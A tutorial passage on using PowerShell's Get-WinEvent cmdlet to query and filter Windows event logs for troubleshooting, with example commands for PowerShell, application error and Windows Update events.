EventLog stores log information for the whole system via Event Tracing for Windows (ETW). For troubleshooting purposes, it is always important to take a dedicated look at the logs to find further information. PowerShell makes this very easy for us with two cmdlets: Get-EventLog and Get-WinEvent. Get-WinEvent is the newer cmdlet, which also allows you to retrieve events from the applications and services logs and uses server-side filtering. Get-EventLog returns objects of the type System.Diagnostics.EventLogEntry, and Get-WinEvent returns objects of the type System.Diagnostics.Eventing.Reader.EventLogRecord. There are significant differences in the properties, as the Source becomes ProviderName, the EntryType becomes LevelDisplayName, and the Category becomes TaskDisplayName. In addition, the replacement strings are only visible if the events are saved as XML. The main purpose of having the new Get-WinEvent cmdlet, though, is for performance reasons, which has been proven by many engineers so far. That is why we will only focus on the Get-WinEvent cmdlet:
#Retrieve all the log files
Get-WinEvent -ListProvider * | Format-Table
#List all event providers for PowerShell.
Get-WinEvent -ListProvider *PowerShell* | Format-Table
#List the logs for PowerShell
Get-WinEvent -ListLog *PowerShell*
#List all possible event IDs and descriptions for Microsoft-Windows-PowerShell
(Get-WinEvent -ListProvider Microsoft-Windows-PowerShell ).Events |
Format-Table id, description -AutoSize
#List all of the event log entries for operational PowerShell information
Get-WinEvent -LogName Microsoft-Windows-PowerShell/Operational
#Retrieve the provider with the information for event if for module logging
(Get-WinEvent -ListProvider Microsoft-Windows-PowerShell).Events | Where-Object {$_.Id -eq 4103}
#Find an event ID across all ETW providers:
Get-WinEvent -ListProvider * | ForEach-Object { $_.Events | Where-Object {$_.ID -eq 4103} }
#Retrieving warning entries for PowerShell from the last 24 hours
Get-WinEvent -FilterHashTable @{LogName='Windows PowerShell'; Level=3; StartTime=(Get-Date).AddDays(-1)}
#Find all application errors from the last 7 days
Get-WinEvent -FilterHashtable @{Logname="Application"; ProviderName="Application Error"; Data="outlook.exe"; StartTime=(Get-Date).AddDays(-7)}
#Working with the FilterHashTable
#Retrieving the last 10 successfully applied updates
$filter = @{ ProviderName="Microsoft-Windows-WindowsUpdateClient"; Id=19 }
Get-WinEvent -FilterHashtable $filter | Select-Object -ExpandProperty Message -First 10
#Working with FilterHashTable and converting the properties to an array
$filter = @{ ProviderName="Microsoft-Windows-WindowsUpdateClient"; Id=19 }
Get-WinEvent -FilterHashtable $filter |
ForEach-Object
{
# ReplacementStrings array
$ReplacementStrings = $_.Properties | ForEach-Object { $_.Value }
#Creating PSCustomObjects with the array information
[PSCustomObject]@{
Time = $_.TimeCreated
Name = $ReplacementStrings[0] # the first index contains the name
User = $_.UserId.Value
}
}
As seen, the usage of the cmdlet is intuitive and straightforward. If you are investigating similar problems in the support desk, it could definitely make sense to create some templates to search for and retrieve events, and even consolidate information automatically. Try to find any patterns in your recurring problems and always try to find the root cause.
https://blogs.technet.microsoft.com/ashleymcglone/2013/08/28/powershell-get-winevent-xml-madness-getting-details-from-event-logs/